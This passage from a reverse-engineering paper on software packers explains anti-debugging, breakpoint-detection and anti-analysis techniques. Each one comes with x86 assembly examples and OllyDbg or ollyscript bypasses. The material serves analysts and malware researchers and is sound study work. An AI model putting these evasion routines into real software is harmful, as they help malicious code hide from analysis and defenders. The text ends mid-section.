 1. The kernel32!IsDebuggerPresent() API checks the value of 
this flag to identify if the process is being debugged by a user-mode debugger. 
 
The code below shows the actual implementation of the IsDebuggerPresent() API. It accesses the Thread Environment Block (TEB)
2 in order to get the address of PEB, and then checks the 
BeingDebugged flag at offset 0x02 of the PEB. 
 
mov     eax, large fs:18h 
mov     eax, [eax+30h] 
movzx   eax, byte ptr [eax+2] 
retn 
 
Instead of calling IsDebuggerPresent(), some packers manually checks the PEB for the 
BeingDebugged flag, this is in case a reverser sets a breakpoint or patch the said API.  
Example 
Below is an example code for identifying if a debugger is present using the 
IsDebuggerPresent() API and the PEB.BeingDebugged flag: 
 
    ; call kernel32!IsDebuggerPresent() 
    call    [IsDebuggerPresent] 
    test    eax,eax 
    jnz     .debugger_found 
 
    ; check PEB.BeingDebugged directly 
    mov     eax,dword [fs:0x30]    ;EAX = TEB.ProcessEnvironmentBlock 
    movzx   eax,byte [eax+0x02]    ;AL  = PEB.BeingDebugged 
    test    eax,eax 
    jnz     .debugger_found 
 
Since these checks are very obvious, packers obfuscate them by using garbage codes or anti-
disassembly techniques discussed in later sections. 
  
Solution 
This technique can be easily bypassed by manually patching the PEB.BeingDebugged flag with 
the byte value of 0x00. To view the PEB in OllyDbg, in the data window, press Ctrl+G (Goto Expression), type fs:[30]. 
 
Additionally, the Ollyscript
3 command “dbh” patches the said byte: 
 
    dbh          
 
Finally, the Olly Advanced3 plugin has on option to set the BeingDebugged field to 0. 
                                                
1 Data type of the PEB structure is _PEB which can be viewed in WinDbg using the dt command 
2 Data type of the TEB structure is _TEB 
3 See the TOOLS section for more information about these tools  
The Art of Unpacking                                                                                                                     5   
 
  2.2.  PEB.NtGlobalFlag, Heap Flags 
 
PEB.NtGlobalFlag. The PEB has another field called NtGlobalFlag (offset 0x68) which packers 
also use to detect if a program had been loaded by a debugger. Normally, when a process is 
not being debugged, the NtGlobalFlag field contains the value 0x0, however, if the process is 
being debugged, the said field will usually contain the value 0x70 which signifies the following 
flags are set:  
 
• FLG_HEAP_ENABLE_TAIL_CHECK (0x10) 
• FLG_HEAP_ENABLE_FREE_CHECK (0x20) 
• FLG_HEAP_VALIDATE_PARAMETERS (0x40) 
 
These flag are set inside the ntdll!LdrpInitializeExecutionOptions(). Note that the default value 
of PEB.NtGlobalFlag can be overridden using the gflags.exe tool or by creating an entry in the following registry key: 
 
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options 
 Heap Flags . Due to the flags set in NtGlobalFlag, heaps that are created will have several flags 
turned on, and that this behavior can be observed inside ntdll!RtlCreateHeap(). Typically, the 
initial heap created for the process (PEB.ProcessHeap) will have its Flags and ForceFlags fields
4 
set to 0x02 (HEAP_GROWABLE) and 0x0 respectively. However, when a process is being debugged, these flags are usually set to 0x50000062 (depending on the NtGlobalFlag) and 
0x40000060 (which is Flags AND 0x6001007D). By default, the following additional heap flags 
are set when a heap is created on a debugged process: 
 
• HEAP_TAIL_CHECKING_ENABLED (0x20) 
• HEAP_FREE_CHECKING_ENABLED (0x40) 
 Example 
The example code below checks if PEB.NtGlobalFlag is not equal to 0, and if additional flags 
are set PEB.ProcessHeap: 
 
    ;ebx = PEB 
    mov     ebx,[fs:0x30]        
 
    ;Check if PEB.NtGlobalFlag != 0 
    cmp     dword [ebx+0x68],0 
    jne     .debugger_found 
     
    ;eax = PEB.ProcessHeap 
    mov     eax,[ebx+0x18] 
     
    ;Check PEB.ProcessHeap.Flags 
    cmp     dword [eax+0x0c],2 
    jne     .debugger_found     
     
    ;Check PEB.ProcessHeap.ForceFlags 
    cmp     dword [eax+0x10],0 
    jne     .debugger_found 
 
Solution 
The solution is to patch PEB.NtGlobalFlag and PEB.HeapProcess flags to their corresponding 
values as if the process is not being debugged. The following is an example ollyscript to patch the said flags:  
  
    var     peb 
    var     patch_addr 
                                                
4 Data type for the heap structure is _HEAP 
The Art of Unpacking                                                                                                                     6   
 
      var     process_heap 
     
    //retrieve PEB via a hardcoded TEB address (first thread: 0x7ffde000) 
    mov     peb,[7ffde000+30] 
     
    //patch PEB.NtGlobalFlag 
    lea     patch_addr,[peb+68] 
    mov     [patch_addr],0 
 
    //patch PEB.ProcessHeap.Flags/ForceFlags 
    mov     process_heap,[peb+18] 
    lea     patch_addr,[process_heap+0c] 
    mov     [patch_addr],2 
    lea     patch_addr,[process_heap+10] 
    mov     [patch_addr],0 
 
Also, the Olly Advanced plugin has on option to set PEB.NtGlobalFlags and the 
PEB.ProcessHeap flags. 
2.3.  DebugPort: CheckRemoteDebuggerPresent() / NtQueryInformationProcess() 
 
Kernel32!CheckRemoteDebuggerPresent() is another API which can be used to determine if a 
debugger is attached to the process. This API internally invokes ntdll! 
NtQueryInformationProcess() with the ProcessInformationClass parameter set to 
ProcessDebugPort (7). Furthermore, inside the kernel, NtQueryInformationProcess() queries the DebugPort field of the EPROCESS
5 kernel structure. A non-zero value in the DebugPort 
field indicates that the process is being debugged by user-mode debugger, if that is the case, 
ProcessInformation will be set with the value 0xFFFFFFFF, otherwise, ProcessInformation will 
be set with the value 0x0. 
 
Kernel32!CheckRemoteDebuggerPresent() accepts 2 parameters, the first parameter is the 
process handle  and the second parameter is a pointer to a boolean variable that will contain a TRUE value if the process is being debugged. 
 
BOOL CheckRemoteDebuggerPresent(     
  HANDLE hProcess, 
  PBOOL  pbDebuggerPresent 
)   
 
Ntdll!NtQueryInformationProcess() on the other hand, have 5 parameters. For the purpose of 
detecting a debugger, the ProcessInformationClass is set to ProcessDebugPort (7): 
 
 
NTSTATUS NTAPI NtQueryInformationProcess(    
  HANDLE           ProcessHandle, 
  PROCESSINFOCLASS ProcessInformationClass, 
  PVOID            ProcessInformation, 
  ULONG            ProcessInformationLength, 
  PULONG           ReturnLength 
)   
 
Example 
The example below shows a typical call to CheckRemoteDebuggerPresent() and 
NtQueryInformationProcess () to detect if the current process is being debugged: 
 
    ; using kernel32!CheckRemoteDebuggerPresent() 
    lea     eax,[.bDebuggerPresent] 
    push    eax          ;pbDebuggerPresent 
    push    0xffffffff   ;hProcess 
    call    [CheckRemoteDebuggerPresent] 
    cmp     dword [.bDebuggerPresent],0 
                                                
5 Data type of the EPROCESS structure is _EPROCESS  
The Art of Unpacking                                                                                                                     7   
 
      jne     .debugger_found 
     
    ; using ntdll!NtQueryInformationProcess(ProcessDebugPort) 
    lea     eax,[.dwReturnLen] 
    push    eax                 ;ReturnLength 
    push    4                   ;ProcessInformationLength 
    lea     eax,[.dwDebugPort] 
    push    eax                 ;ProcessInformation 
    push    ProcessDebugPort    ;ProcessInformationClass (7) 
    push    0xffffffff          ;ProcessHandle 
    call    [NtQueryInformationProcess] 
    cmp     dword [.dwDebugPort],0 
    jne     .debugger_found  
 
Solution  One solution involves setting a breakpoint where NtQueryInformationProcess() returns, then 
when the breakpoint is hit,  ProcessInformation is patched with a DWORD value 0. An example 
ollyscript to perform this automatically is shown below: 
 
    var     bp_NtQueryInformationProcess 
     
    // set a breakpoint handler 
    eob     bp_handler_NtQueryInformationProcess 
     
    // set a breakpoint where NtQueryInformationProcess returns 
    gpa     "NtQueryInformationProcess", "ntdll.dll" 
    find    $RESULT, #C21400#   //retn 14 
    mov     bp_NtQueryInformationProcess,$RESULT 
    bphws   bp_NtQueryInformationProcess,"x"     
    run 
         
bp_handler_NtQueryInformationProcess: 
    //ProcessInformationClass == ProcessDebugPort? 
    cmp     [esp+8], 7 
    jne     bp_handler_NtQueryInformationProcess_continue 
     
    //patch ProcessInformation to 0 
    mov     patch_addr, [esp+c] 
    mov     [patch_addr], 0     
 
    //clear breakpoint 
    bphwc   bp_NtQueryInformationProcess 
     
bp_handler_NtQueryInformationProcess_continue: 
    run 
 
The Olly Advanced plugin has an option to patch NtQueryInformationProcess(). The patch 
involves injecting a code that will manipulate the return value of NtQueryInformationProcess(). 
2.4.  Debugger Interrupts 
 
This technique uses the fact that when the interrupt instructions INT3 (breakpoint) and INT1 
(single-step) are stepped thru inside a debugger, by default, the exception handler will not be 
invoked since debuggers typically handle the exceptions generated by these interrupts. Thus, 
a packer can set flags inside the exception handler, and if these flags are not set after the INT 
instruction, it means that the process is being debugged. Additionally, kernel32!DebugBreak() 
internally invokes an INT3 and some packers use the said API instead.  
Example 
This example sets the value of EAX to 0xFFFFFFFF (via the CONTEXT
6 record) while inside 
exception handler to signify that the exception handler had been called: 
                                                
6 A context record contains the state of a thread; its data type is _CONTEXT. The context record passed to 
the exception handler is the current state of the thread that thrown the exception 
The Art of Unpacking                                                                                                                     8   
 
  
    ;set exception handler 
    push    .exception_handler 
    push    dword [fs:0] 
    mov     [fs:0], esp 
     
    ;reset flag (EAX) invoke int3 
    xor     eax,eax 
    int3         
     
    ;restore exception handler 
    pop     dword [fs:0] 
    add     esp,4     
     
    ;check if the flag had been set 
    test    eax,eax 
    je      .debugger_found 
 
    ::: 
     
.exception_handler: 
    ;EAX = ContextRecord 
    mov     eax,[esp+0xc] 
    ;set flag (ContextRecord.EAX) 
    mov     dword [eax+0xb0],0xffffffff 
    ;set ContextRecord.EIP 
    inc     dword [eax+0xb8] 
    xor     eax,eax 
    retn 
 
Solution  In OllyDbg, while stepping thru or execution had stopped due to a debugger interrupt, identify 
the exception handler address (via View -> SEH Chain) and then set a breakpoint on the 
exception handler. Then, press Shift+F9 so that the single-step/breakpoint exception 
generated by these interrupts is passed to the exception handler. The breakpoint will 
eventually be hit and the exception handler 
can be traced. 
 Another solution is to allow single-
step/breakpoint exceptions to be 
automatically passed to the exception 
handler. This can be set in OllyDbg via 
Options -> Debugging Options -> Exceptions 
-> “Ignore following exceptions” and then 
check the “INT 3 breaks” and “Single-step break” check boxes. 
2.5.  Timing Checks 
 
When a process is being debugged, several CPU cycles are spent by the debugger event 
handling code, a reverser stepping thru the instructions, etc. Packers takes advantage of this 
by determining the time spent between several instructions, if the time spent took longer compared to a normal run, it probably means that the process is being executed under a 
debugger. 
 
Example 
Below is a simple example of a timing check. It uses the RDTSC (Read Time-Stamp Counter) 
instruction before and after several instructions, and then computes the delta. The delta value 
of 0x200 depends on how much code is executed between the two RDTSC instructions.  
    rdtsc 
    mov     ecx,eax 
    mov     ebx,edx 
The Art of Unpacking                                                                                                                     9   
 
       
    ;... more instructions 
    nop 
    push    eax 
    pop     eax 
    nop 
    ;... more instructions 
     
    ;compute delta between RDTSC instructions 
    rdtsc  
     
    ;Check high order bits 
    cmp     edx,ebx 
    ja      .debugger_found 
    ;Check low order bits 
    sub     eax,ecx 
    cmp     eax,0x200 
    ja      .debugger_found 
 
Variations of timing checks includes using the API kernel32!GetTickCount(), or manually 
checking the value of the TickCountLow and TickCountMultiplier fields of the SharedUserData7 
data structure which is always located at the address 0xc.  
 
These timing techniques, specially using RDTSC can be difficult to identify if garbage codes and other obfuscation techniques attempts to hide them. 
 
Solution  
One solution would be to identify where the timing checks are and then avoiding stepping thru 
code in between these timing checks. The reverser can just set a breakpoint just before the delta comparison and then perform a Run instead of a Step until the breakpoint is hit. 
Additionally, a breakpoint can be set in GetTickCount() to determine where it had been called 
or to modify its return value. 
 
Olly Advanced has another solution - It installs a kernel mode driver that does the following:  
 
1. Sets that Time Stamp Disable Bit (TSD) in control register CR4
8. When the said bit 
is set and if the RDTSC instruction is executed in a privilege level other than 0, a 
General Protection (GP) exception will be triggered.  
 
2. The Interrupt Descriptor Table (IDT) is set up so that the GP exception is hooked 
and execution of RTDSC is filtered. If the GP is because of an RDTSC instruction, 
just increment the returned timestamp from the previous call by 1. 
 
It should be noted that the discussed driver may cause instability to the system, thus, 
experimenting with this feature should always be done on a non-production machine or in a 
virtual machine. 
2.6.  SeDebugPrivilege 
 
By default, a process has the SeDebugPrivilege privilege in their access token disabled. However, when the process is loaded by a debugger such as OllyDbg and WinDbg, the 
SeDebugPrivilege privilege is enabled. This is the case since these debuggers attempt to 
adjust their token to enable the said privilege and when the debugged process is loaded, the 
SeDebugPrivilege privilege is inherited. 
 
Some packers indirectly use SeDebugPrivilege to identify if the process is being debugged by 
attempting to open the CSRSS.EXE process. If a process is able to open the CSRSS.EXE 
                                                
7 Data type of SharedUserData is _KUSER_SHARED_DATA 
8 See “Control Registers” in IA-32 Intel® Architecture Software Developer's Manual Volume 3A: System 
Programming Guide, Part 1 
The Art of Unpacking                                                                                                                     10   
 
  process; it means that the process has the SeDebugPrivilege privilege enabled in the access 
token, and thus, suggesting that the process is being debugged. This check works because the 
security descriptor of the CSRSS.EXE process only allows SYSTEM to access the said process, 
but if a process has the SeDebugPrivilege privilege; it can access another process regardless 
of the security descriptor9. Note that this privilege is only granted to members of the 
Administrators group by default. 
 
Example An example check is shown below: 
 
    ;query for the PID of CSRSS.EXE 
    call    [CsrGetProcessId] 
     
    ;try to open the CSRSS.EXE process 
    push    eax 
    push    FALSE 
    push    PROCESS_QUERY_INFORMATION 
    call    [OpenProcess] 
     
    ;if OpenProcess() was successful,  
    ;   process is probably being debugged 
    test     eax,eax     
    jnz     .debugger_found 
 
This check uses the API ntdll!CsrGetProcessId() to retrieve the PID of CSRSS.EXE, but packers may obtain the PID of CSRSS.EXE manually via process enumeration. If OpenProcess() 
succeeds, it means that SeDebugPrivilege is enabled which also means that the process is possibly being debugged. 
 
Solution  
One solution is to set a breakpoint where ntdll!NtOpenProcess() returns, once the breakpoint 
is hit, set the value of EAX to 0xC0000022 (STATUS_ACCESS_DENIED) if the passed PID is 
that of CSRSS.EXE. 
2.7.  Parent Process 
 
Typically, a process has explorer.exe as its parent process (eg: executable is double-clicked); 
a parent process other than explorer.exe suggests that an application is spawned by a 
different application and thus suggests that it is possibly being debugged.  
 
One way to implement this check is as follows:   
1. Retrieve the current process’ PID via the TEB (TEB.ClientId) or using 
GetCurrentProcessId() 
 
2. List all processes using Process32First/Next() and take note of explorer.exe’s PID 
(via PROCESSENTRY32.szExeFile) and the PID of the parent process of the current 
process via PROCESSENTRY32.th32ParentProcessID 
 
3. If the PID of the parent process is not the PID of explorer.exe, the target is 
possibly being debugged. 
 
However, note that this debugger check will trigger a false positive if the executable is being 
executed via the command prompt or the default shell is different. 
 Solution  
A solution provided by Olly Advanced is to set Process32Next() to always fail, this way, the 
packer’s process enumeration code will fail and possibly skip the PID checks due to process 
                                                
9 See OpenProcess() API in MSDN: http://msdn2.microsoft.com/en-us/library/ms684320.aspx  
The Art of Unpacking                                                                                                                     11   
 
  enumeration failure. This is done by patching the entry of kernel32!Process32NextW() with a 
code the sets the value of EAX to 0 and then perform a return: 
 
 
2.8.  DebugObject: NtQueryObject() 
 
Instead of identifying if the process is being debugged, other techniques involve checking if a 
debugger is running in the system.   
One interesting method discussed in reversing forums is by checking the number of kernel 
objects of type DebugObject
10. This works because every time an application is being 
debugged, in the kernel, an object of type DebugObject is created for the debugging session. 
 
The number of DebugObject can be obtained by querying information about all object types 
using ntdll!NtQueryObject(). NtQueryObject accepts 5 parameters, and for the purpose of querying all objects types, the ObjectHandle parameter is set to NULL and 
ObjectInformationClass is to ObjectAllTypeInformation (3): 
 
NTSTATUS NTAPI NtQueryObject(    
  HANDLE   ObjectHandle, 
  OBJECT_INFORMATION_CLASS  ObjectInformationClass, 
  PVOID   ObjectInformation, 
  ULONG   Length, 
  PULONG  ResultLength 
)   
 The said API returns an OBJECT_ALL_INFORMATION structure, in which the 
NumberOfObjectsTypes field is the count of total object types in the ObjectTypeInformation 
array: 
 
typedef struct _OBJECT_ALL_INFORMATION { 
  ULONG NumberOfObjectsTypes; 
  OBJECT_TYPE_INFORMATION ObjectTypeInformation[1]; 
}  
 The detection routine will then iterate thru the ObjectTypeInformation array which has the 
following structure: 
 
typedef struct _OBJECT_TYPE_INFORMATION { 
   [00] UNICODE_STRING TypeName;  
   [08] ULONG TotalNumberOfHandles;  
   [0C] ULONG TotalNumberOfObjects;  
   ... more fields ... 
} 
 
The TypeName field is then compared to the UNICODE string “DebugObject”, and then the 
TotalNumberOfObjects or the TotalNumberOfHandles field is checked for a non-zero value. 
 
Solution 
Similar to the NtQueryInformationProcess() solution, a breakpoint can be set where 
NtQueryObject() returns. Then, the returned OBJECT_ALL_INFORMATION structure can be 
patched. Specifically, the NumberOfbjectsTypes field can be set to 0 to prevent packers from iterating thru the ObjectTypeInformation array. A similar ollyscript from the 
NtQueryInformationProcess() solution can be created to perform this via a script.  
                                                
10 More information about DebugObject can be found on the Windows Native Debugging Internals articles 
by Alex Ionescu on http://www.openrce.org/articles/full_view/25  and 
http://www.openrce.org/articles/full_view/26  
The Art of Unpacking                                                                                                                     12   
 
   
Similarly, the Olly advanced plugin injects code in the NtQueryObject() API which will zero out 
the entire returned buffer if the query is of type ObjectAllTypeInformation. 
2.9.  Debugger Window 
 
The existence of debugger windows are identifying marks that a debugger is running in the 
system. Since debuggers create windows with specific class names (OLLYDBG for OllyDbg, WinDbgFrameClass for WinDbg), these debugger windows are easily identified using 
user32!FindWindow() or user32!FindWindowEx(). 
 
Example 
The example code below uses FindWindow() to identify if OllyDbg or WinDbg is running in the 
system via the windows they create: 
 
    push    NULL 
    push    .szWindowClassOllyDbg 
    call    [FindWindowA] 
    test    eax,eax     
    jnz     .debugger_found 
     
    push    NULL 
    push    .szWindowClassWinDbg 
    call    [FindWindowA] 
    test    eax,eax 
    jnz     .debugger_found 
 
.szWindowClassOllyDbg   db "OLLYDBG",0          
.szWindowClassWinDbg    db "WinDbgFrameClass",0 
 
Solution 
One solution is to set a breakpoint in the entry of FindWindow()/FindWindowEx(). When the 
breakpoint is hit, change the contents of the lpClassName string parameter so that the API will 
fail. Other solution involves just setting the return value to NULL. 
2.10.  Debugger Process 
 
Another way to identify if a debugger is running in the system is to list all process and check if 
the process name is that of a debugger (e.g. OLLYDBG.EXE, windbg.exe, etc.) The 
implementation is straight forward and just involves using Process32First/Next() and then checking if the image name is that of a debugger. 
 
Some packers also go as far as reading a process’ memory using 
kernel32!ReadProcessMemory() and then search for debugger-related strings (e.g. 
“OLLYDBG”) in case the reverser renames the debugger’s executable. Once a debugger is 
found, the packer may display an error message, silently exit or terminate the debugger. 
 Solution 
Similar to the solution for the parent process check, the solution involves patching 
kernel32!Process32NextW() to always fail to prevent the packer from enumerating the 
processes. 
2.11.  Device Drivers 
 
A classic technique for detecting if a kernel mode debugger is active in the system is to try 
accessing their device drivers. The technique is fairly simple and just involves calling 
kernel32!CreateFile() against well-known device names used by kernel mode debuggers such 
as SoftICE. 
 
 
The Art of Unpacking                                                                                                                     13   
 
  Example 
A simple check would be: 
 
    push    NULL 
    push    0 
    push    OPEN_EXISTING 
    push    NULL 
    push    FILE_SHARE_READ 
    push    GENERIC_READ 
    push    .szDeviceNameNtice 
    call    [CreateFileA] 
    cmp     eax,INVALID_HANDLE_VALUE     
    jne     .debugger_found 
 
.szDeviceNameNtice  db "\\.\NTICE",0 
 
Some versions of SoftICE also append numbers in the device name causing this check to 
always fail. A workaround described in reversing forums involve brute forcing the appended 
numbers until the correct device name is found. Newer packers also use the device driver detection technique to detect system monitors such as Regmon and Filemon. 
 
Solution 
A simple solution would be to set a breakpoint inside kernel32!CreateFileFileW(), and when the 
breakpoint is hit, either manipulate the FileName parameter or change its return value to INVALID_HANDLE_VALUE  (0xFFFFFFFF). 
2.12.  OllyDbg: Guard Pages 
 
This check is specific to OllyDbg, since it is related to OllyDbg’s on-acess/write memory 
breakpoint feature.  
 
Aside from hardware and software breakpoints, OllyDbg allows an on-access/write memory 
breakpoint; this type of breakpoint is implemented using guard pages
11. Simply stated, guard 
pages provide an application a way to be notified if a memory is being accessed.  
 
Guard pages are set using the PAGE_GUARD page protection modifier, if the address is being 
accessed is part of a guard page, STATUS_GUARD_PAGE_VIOLATION (0x80000001) w ill be 
raised.  Packers use the behavior that if the process is being debugged under OllyDbg and a 
guard page is being accessed, no exception will be thrown, instead, the access will be treated 
as a memory breakpoint.  
Example 
In the example code below, the code allocates a memory, store code in the allocated memory, 
and then enable the PAGE_GUARD attribute. It then initializes its marker (EAX) to 0, and 
trigger the STATUS_GUARD_PAGE_VIOLATION by executing code in the page guarded allocated memory. If the code is being debugged in OllyDbg, the marker will be unchanged 
since the exception handler will not be called. 
 
    ; set up exception handler 
    push    .exception_handler 
    push    dword [fs:0] 
    mov     [fs:0], esp    
 
    ; allocate memory 
    push    PAGE_READWRITE  
    push    MEM_COMMIT 
    push    0x1000 
    push    NULL 
    call    [VirtualAlloc] 
    test    eax,eax 
                                                
11 See http://msdn2.microsoft.com/en-us/library/aa366549.aspx  for explanation of guard pages 
The Art of Unpacking                                                                                                                     14   
 
      jz      .failed     
    mov     [.pAllocatedMem],eax 
     
    ; store a RETN on the allocated memory 
    mov     byte [eax],0xC3         
 
    ; then set the PAGE_GUARD attribute of the allocated memory 
    lea     eax,[.dwOldProtect] 
    push    eax 
    push    PAGE_EXECUTE_READ | PAGE_GUARD 
    push    0x1000 
    push    dword [.pAllocatedMem] 
    call    [VirtualProtect]     
     
    ; set marker (EAX) as 0 
    xor     eax,eax     
    ; trigger a STATUS_GUARD_PAGE_VIOLATION exception 
    call    [.pAllocatedMem] 
    ; check if marker had not been changed (exception handler not called) 
    test    eax,eax 
    je      .debugger_found    
    ::: 
   
.exception_handler 
    ;EAX = CONTEXT record 
    mov     eax,[esp+0xc]     
    ;set marker (CONTEXT.EAX) to 0xffffffff  
    ; to signal that the exception handler was called 
    mov     dword [eax+0xb0],0xffffffff         
    xor     eax,eax 
    retn            
 
Solution  
Since guard pages triggers an exception, the reverser can deliberately trigger an exception so 
that the exception handler will be called. In the example shown, a reverser can replace the 
RETN instruction with an “INT3” then a “RETN” instruction, once INT3 is executed, force the 
debugger to call the exception handler via Shift+F9. Then, after the exception handler is called, EAX will be set to the proper value, and then the RETN instruction will be executed. 
 
If the exception handler checks if the exception was indeed a 
STATUS_GUARD_PAGE_VIOLATION, a reverser can set a breakpoint in the exception handler 
and then modify the passed ExceptionRecord parameter, specifically, ExceptionRecord. 
ExceptionCode is set to STATUS_GUARD_PAGE_VIOLATION manually. 
 
3. TECHNIQUES: BREAKPOINT AND PATCHING DETECTION 
 
This section lists the most common ways on how packers identify software breakpoints, 
hardware breakpoints and patching. 
3.1.  Software Breakpoint Detection 
 
Software breakpoints are breakpoints which are set by modifying the code at the target 
address, replacing it with a byte value 0xCC (INT3 / Breakpoint Interrupt). Packers identify 
software breakpoints by scanning for the byte 0xCC in the protector code and/or an API code. 
 
Example  
A check can be as simple as the following: 
 
    cld 
    mov     edi,Protected_Code_Start 
    mov     ecx,Protected_Code_End - Protected_Code_Start 
    mov     al,0xcc 
The Art of Unpacking                                                                                                                     15   
 
      repne   scasb 
    jz     .breakpoint_found         
 
Some packers apply some operation on the compared byte value so the check is not obvious, 
such as:  
if(byte XOR 0x55 == 0x99) then breakpoint found 
 
Where: 0x99 == 0xCC XOR 0x55 
 Solution 
If software breakpoints are being identified, the reverser can use hardware breakpoints 
instead. If a breakpoint is needed to be set inside an API code, but the packer attempts to 
search for breakpoints inside an API code, the reverser can set a breakpoint on the UNICODE 
version of the API which will be eventually called by the ANSI versions (eg: LoadLibraryExW 
instead of LoadLibraryA), or the corresponding native API (ntdll!LdrLoadDll) instead. 
3.2.  Hardware Breakpoint Detection 
 
Another type of breakpoint is a hardware breakpoint. Hardware breakpoints are set by setting 
the debug registers
12, these registers are named Dr0 to Dr7. Dr0-Dr3 contains the address of 
up to four breakpoints, Dr6 contains flags to identify what breakpoint had been triggered, 
while Dr7 contains flags to control the four hardware breakpoints such as enabling/disabling 
breakpoints or breaking on read/write. 
 
Detecting hardware breakpoints requires a bit of code to perform since debug registers are not accessible in Ring 3. Thus, packers utilize the CONTEXT structure which contains the values of 
the debug registers. The CONTEXT structure is accessed via the ContextRecord parameter 
passed to an exception handler. 
 
Example Here is an example code to query the debug registers: 
 
    ; set up exception handler 
    push    .exception_handler 
    push    dword [fs:0] 
    mov     [fs:0], esp 
     
    ; eax will be 0xffffffff if hardware breakpoints are identified 
    xor     eax,eax  
            
    ; throw an exception 
    mov     dword [eax],0    
     
    ; restore exception handler 
    pop     dword [fs:0] 
    add     esp,4 
     
    ; test if EAX was updated (breakpoint identified) 
    test    eax,eax 
    jnz     .breakpoint_found 
    
    ::: 
 
.exception_handler 
    ;EAX = CONTEXT record 
    mov     eax,[esp+0xc]     
     
    ;check if Debug Registers Context.Dr0-Dr3 is not zero 
    cmp     dword [eax+0x04],0 
                                                
12 See “Debug Registers” in IA-32 Intel® Architecture Software Developer's Manual Volume 3B: System 
Programming Guide, Part 2 
The Art of Unpacking                                                                                                                     16   
 
      jne     .hardware_bp_found 
    cmp     dword [eax+0x08],0 
    jne     .hardware_bp_found 
    cmp     dword [eax+0x0c],0 
    jne     .hardware_bp_found 
    cmp     dword [eax+0x10],0 
    jne     .hardware_bp_found 
    jmp     .exception_ret 
     
.hardware_bp_found 
    ;set Context.EAX to signal breakpoint found 
    mov     dword [eax+0xb0],0xffffffff     
     
.exception_ret 
    ;set Context.EIP upon return 
    add     dword [eax+0xb8],6 
    xor     eax,eax 
    retn 
 
Some packers also use the debug registers as part of decryption keys. Either these registers 
are initialized to a specific value or left to have the value 0. Thus, if these debug registers are 
modified, decryption will fail and will cause unexpected termination due to invalid instructions 
if the code being decrypted is part of the unpacking stub or the protected executable. 
 Solution 
The reverser can try using software breakpoints if software breakpoints are not being checked. 
Also, the on-access/write memory breakpoint feature of OllyDbg can be used. Setting software 
breakpoints inside UNICODE version of the APIs or the native APIs can be another solution if 
the reverser would need to set API breakpoints. 
3.3.  Patching Detection via Code Checksum Calculation 
 
Patching detection tries to identify if a part of the packer code had been modified which 
suggests that anti-debugging routines may had been disabled, and as a second purpose can 
identify if software breakpoints are set. Patching detection is implemented via code checksum, 
and the checksum calculation can range from simple to intricate checksum/hash algorithms. 
 
Example Below is a fairly simple example for checksum calculation: 
 
    mov     esi,Protected_Code_Start 
    mov     ecx,Protected_Code_End - Protected_Code_Start 
    xor     eax,eax 
.checksum_loop 
    movzx   ebx,byte [esi] 
    add     eax,ebx 
    rol     eax,1     
    inc     esi 
    loop    .checksum_loop 
     
    cmp     eax,dword [.dwCorrectChecksum] 
    jne     .patch_found 
 
Solution If software breakpoints are being identified by a code checksum routine, hardware breakpoints 
can be used instead. If code patching is being identified by the checksum routine, a reverser 
can identify where the checksum routine is by setting an on-access breakpoint on the patched 
address, and once the checksum routine is found, modify the checksum value to the expected 
value or just change the appropriate flags after a failed comparison. 
 
The Art of Unpacking                                                                                                                     17   
 
  4. TECHNIQUES: ANTI-ANALYSIS 
 
Anti-analysis techniques aim to slow down reversers from analyzing and understanding the 
protector code and/or the packed executable. Techniques such as encryption/compression, 
garbage code, permutation, and anti-disassembly are discussed. These are the techniques 
which require a reverser to have traits such as patience and cleverness in order to solve since they aim to confuse, bore and waste the time of a reverser. 
4.1.  Encryption and Compression 
 
Encryption and compression are the most basic forms of anti-analysis. They are initial 
defenses to prevent a reverser from just loading the protected executable in a disassembler 
and then start analysis without any difficulty. 
 
Encryption . Packers usually encrypt both the protector code and the protected executable. The 
encryption algorithm greatly varies between packers, which range from very simple XOR loops 
to very complex loops that perform several computations. With polymorphic packers, the 
encryption algorithm also varies between generated samples and the decryption code is 
permutated to look very different on each generated samples, and may prevent a packer 
identifier tool from correctly identifying the packer. 
 
Decryption routines are easily recognizable as loops which perform a fetch, compute, and store data operation. Below is an example of a simple decryption routine that performs several 
XOR operations on an encrypted DWORD value. 
 
0040A07C  LODS DWORD PTR DS:[ESI] 
0040A07D  XOR EAX,EBX 
0040A07F  SUB EAX,12338CC3 
0040A084  ROL EAX,10 
0040A087  XOR EAX,799F82D0 
0040A08C  STOS DWORD PTR ES:[EDI] 
0040A08D  INC EBX 
0040A08E  LOOPD SHORT 0040A07C  ; decryption loop  
 
Here is another example of a decryption routine of a polymorphic packer: 
 
00476056  MOV BH,BYTE PTR DS:[EAX] 
00476058  INC ESI 
00476059  ADD BH,0BD 
0047605C  XOR BH,CL 
0047605E  INC ESI 
0047605F  DEC EDX 
00476060  MOV BYTE PTR DS:[EAX],BH 
00476062  CLC 
00476063  SHL EDI,CL 
::: More garbage code 
00476079  INC EDX 
0047607A  DEC EDX 
0047607B  DEC EAX 
0047607C  JMP SHORT 0047607E 
0047607E  DEC ECX 
0047607F  JNZ 00476056   ;decryption loop 
 
And below is another decryption routine generated by the same polymorphic packer: 
 
0040C045  MOV CH,BYTE PTR DS:[EDI] 
0040C047  ADD EDX,EBX 
0040C049  XOR CH,AL 
0040C04B  XOR CH,0D9 
0040C04E  CLC 
0040C04F  MOV BYTE PTR DS:[EDI],CH 
0040C051  XCHG AH,AH 
0040C053  BTR EDX,EDX 
The Art of Unpacking                                                                                                                     18   
 
  0040C056  MOVSX EBX,CL 
::: More garbage code 
0040C067  SAR EDX,CL 
0040C06C  NOP 
0040C06D  DEC EDI 
0040C06E  DEC EAX 
0040C06F  JMP SHORT 0040C071 
0040C071  JNZ 0040C045    ;decryption loop 
 
In the last two examples, the highlighted lines are the main decryption instructions, while the 
remaining instructions are garbage codes to confuse the reverser. Notice how the registers are 
being swapped and how the decryption method changes between the two examples. 
 Compression . The main purpose of compression is to reduce the size of the executable code 
and its data, but because this results for the original executable including its readable strings 
becoming compressed data, it has the side effect of obfuscation. Some examples of 
compression engine used by packers are - NRV (Not Really Vanished) compression and LZMA 
(Lempel-Ziv-Markov chain-Algorithm) for UPX, aPLib for FSG, LZMA for Upack and LZO for yoda’s Protector. Some of these compression engines are free for non-commercial use but 
requires a license/registration for commercial use. 
 
Solution 
Decryption and decompression loops are easy to bypass, the reverser just needs to know 
when the decryption/decompression loop terminates and then set a breakpoint on the 
instruction after the loop. Remember, some packers may have breakpoint detection code inside these decryption loops.  
4.2.  Garbage Code and Code Permutation 
 
Garbage Code. Inserting garbage code in the unpacking routine is another effective way to 
